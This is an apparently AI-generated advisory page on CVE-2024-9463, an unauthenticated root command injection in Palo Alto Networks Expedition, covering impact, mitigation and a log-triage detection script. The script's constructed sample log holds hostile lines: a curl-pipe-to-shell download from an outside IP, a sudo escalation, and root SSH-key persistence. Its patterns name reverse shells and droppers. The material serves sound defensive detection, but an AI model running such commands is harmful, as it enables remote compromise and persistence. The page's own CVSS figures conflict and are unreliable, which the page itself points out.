CVE-2024-9463

Expedition vulnerability analysis and mitigation — HIGH (CVSS 7.5)

High Profile Threat

Overview

Palo Alto Networks Expedition, the firewall configuration migration tool, contains an OS command injection vulnerability caused by improper input validation. An unauthenticated remote attacker can exploit it over the network, with no user interaction, to execute arbitrary OS commands as root on the Expedition host. Because Expedition holds the credentials of the firewalls it migrates, the vendor advisory notes that this also exposes usernames, cleartext passwords, device configurations, and device API keys of the PAN-OS firewalls Expedition has processed. The vulnerability was disclosed on October 9, 2024. CISA has added CVE-2024-9463 to its Known Exploited Vulnerabilities catalog as exploited in the wild; it is not currently known to be used in ransomware campaigns.

Technical details

Palo Alto Networks Expedition passes attacker-controlled input into OS command execution without validating or neutralizing shell metacharacters. Because the affected code is reachable by an unauthenticated network request, and because the Expedition application is able to run privileged operations on its host, the injected commands execute with root privileges. No prior authentication or user interaction is required.

The vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')) and CWE-20 (Improper Input Validation).

The severity reported for this vulnerability is inconsistent across this page: the title gives a score of 7.5 (High), while the body cites a CVSS v3.1 base score of 9.8 (Critical) with the vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H. That vector does not even produce 9.8: under the CVSS v3.1 formula, Scope: Changed with all three impacts High evaluates to 10.0, and 9.8 is the score of the same vector with Scope: Unchanged (S:U). Palo Alto Networks itself rates the issue Critical (CVSS v4.0 score 9.9) in advisory PAN-SA-2024-0010. Treat the vendor advisory and NVD as authoritative for the score, and treat the issue as critical for prioritization regardless: unauthenticated root command execution on a host that stores firewall credentials is worst-case impact.

Impact

Successful exploitation gives an unauthenticated remote attacker arbitrary command execution as root on the Expedition host: full control of the system, including reading or modifying any file, installing backdoors, and using the host as a pivot into the network. The more serious consequence is specific to what Expedition is for. It stores administrator usernames, passwords, device configurations, and API keys for the PAN-OS firewalls it migrates, so a root compromise of Expedition hands the attacker credentials for the production firewalls themselves, which should be treated as compromised until rotated.

Mitigation and workarounds

Upgrade Palo Alto Networks Expedition to version 1.2.96 or later, the fixed release named in Palo Alto Networks advisory PAN-SA-2024-0010 for this issue. Follow the vendor's standard upgrade procedure for your Expedition deployment, and take a backup and test in a non-production environment before applying the upgrade to production systems. Palo Alto Networks has since declared Expedition end-of-life (December 31, 2024), so the durable fix is to complete any outstanding migrations and retire the tool rather than keep a patched instance running.

As temporary workarounds until the upgrade can be applied: restrict network access to the Expedition web interface to the administrators, hosts, and networks that need it, using firewall rules, a VPN, or network segmentation, and do not expose it to the internet; shut Expedition down entirely if it is not actively being used for a migration; and monitor the Expedition web server and application logs and the host's system logs for unexpected command execution or unusual process activity. Because Expedition stores credentials for the firewalls it has processed, also rotate every Expedition username, password, and API key, and every firewall username, password, and API key that passed through Expedition, after upgrading or whenever compromise is suspected.
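The log-monitoring workaround above is only useful with concrete logic behind it. The following is an added example, not code from the page or from Palo Alto Networks, of triaging a process-execution feed from the Expedition host for the post-exploitation shape of a CWE-78 root command injection: shells spawned by the web tier, the web user stepping up to root, and download-and-run or dropper command lines. It assumes the Expedition PHP application runs under Apache as the www-data user on a stock Ubuntu host, that process-exec events are available as JSON lines with the field names used here (from auditd, an EDR agent, or similar), and that the sample events are constructed for this example; none of those assumptions comes from the page.

```python
"""Process-exec log triage for a host running Expedition (added example).

Assumptions, not from the advisory page: the web application runs under
Apache as www-data, the host exports process-exec events as JSON lines with
the fields used below, and SAMPLE_LOG is constructed for this example."""
import json
import re

WEB_USERS = {"www-data"}
WEB_PARENTS = {"apache2", "php-fpm"}          # parents that should never spawn shells
SHELLS = {"sh", "bash", "dash", "python3", "perl"}
LOLBINS = {"curl", "wget", "nc", "ncat", "base64", "chmod"}
# download-and-run pipelines, /dev/tcp reverse shells, staged droppers in /tmp
SUSPICIOUS_ARGS = re.compile(
    r"(/dev/tcp/|\|\s*(ba)?sh\b|base64\s+(-d|--decode)|/tmp/\S+\.sh|chmod\s+\+x)"
)


def classify(event):
    """Return the names of the rules an exec event matches (empty if none)."""
    hits = []
    comm = event["exe"].rsplit("/", 1)[-1]
    args = event.get("cmdline", "")
    # Anything in the web tier's process tree counts as "from the web app".
    from_web = (event["user"] in WEB_USERS
                or event.get("parent_user") in WEB_USERS
                or event.get("parent_comm") in WEB_PARENTS)
    if from_web and comm in SHELLS:
        hits.append("web-tier-spawned-shell")
    if event["user"] in WEB_USERS and comm == "sudo":
        hits.append("web-user-sudo")            # www-data trying to step up to root
    if event["user"] == "root" and event.get("parent_user") in WEB_USERS:
        hits.append("root-child-of-web-user")   # the escalation actually happened
    if from_web and comm in LOLBINS:
        hits.append("web-tier-lolbin")
    if from_web and SUSPICIOUS_ARGS.search(args):
        hits.append("suspicious-cmdline")
    return hits


def scan(lines):
    """Run classify() over JSON-lines input and return the alerts in order."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        rules = classify(ev)
        if rules:
            alerts.append({"ts": ev["ts"], "user": ev["user"],
                           "cmd": ev.get("cmdline", ev["exe"]), "rules": rules})
    return alerts


# Constructed sample feed: two benign events followed by an injection chain
# (web-tier shell fetching a script, sudo to root, root persisting via SSH key).
SAMPLE_LOG = r"""
{"ts":"2024-11-15T09:00:01Z","user":"www-data","parent_user":"root","parent_comm":"apache2","exe":"/usr/sbin/apache2","cmdline":"/usr/sbin/apache2 -k start"}
{"ts":"2024-11-15T09:00:05Z","user":"root","parent_user":"root","parent_comm":"cron","exe":"/usr/bin/php","cmdline":"php /var/www/html/cron.php"}
{"ts":"2024-11-15T09:01:12Z","user":"www-data","parent_user":"www-data","parent_comm":"apache2","exe":"/usr/bin/sh","cmdline":"sh -c \"curl http://203.0.113.9/x.sh|sh\""}
{"ts":"2024-11-15T09:01:13Z","user":"www-data","parent_user":"www-data","parent_comm":"sh","exe":"/usr/bin/sudo","cmdline":"sudo /usr/bin/bash"}
{"ts":"2024-11-15T09:01:14Z","user":"root","parent_user":"www-data","parent_comm":"sudo","exe":"/usr/bin/bash","cmdline":"bash -c \"echo ssh-ed25519 AAAA... >> /root/.ssh/authorized_keys\""}
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG.splitlines()):
        print(a["ts"], a["user"], ",".join(a["rules"]), "::", a["cmd"])
```

Two caveats for real use. Expedition legitimately shells out for some of its own tooling, so baseline the host for a few days and tune WEB_PARENTS and SHELLS before paging on "web-tier-spawned-shell"; the "web-user-sudo" and "root-child-of-web-user" rules are the high-confidence ones. These rules detect the generic behaviour of an OS command injection being used, not this CVE specifically; the page gives no request-level indicator to write a signature from.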

CISA's recommendation: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Source: This report was generated using AI

Related Palo Alto Networks Vulnerabilities

No related vulnerabilities found with identified affected products.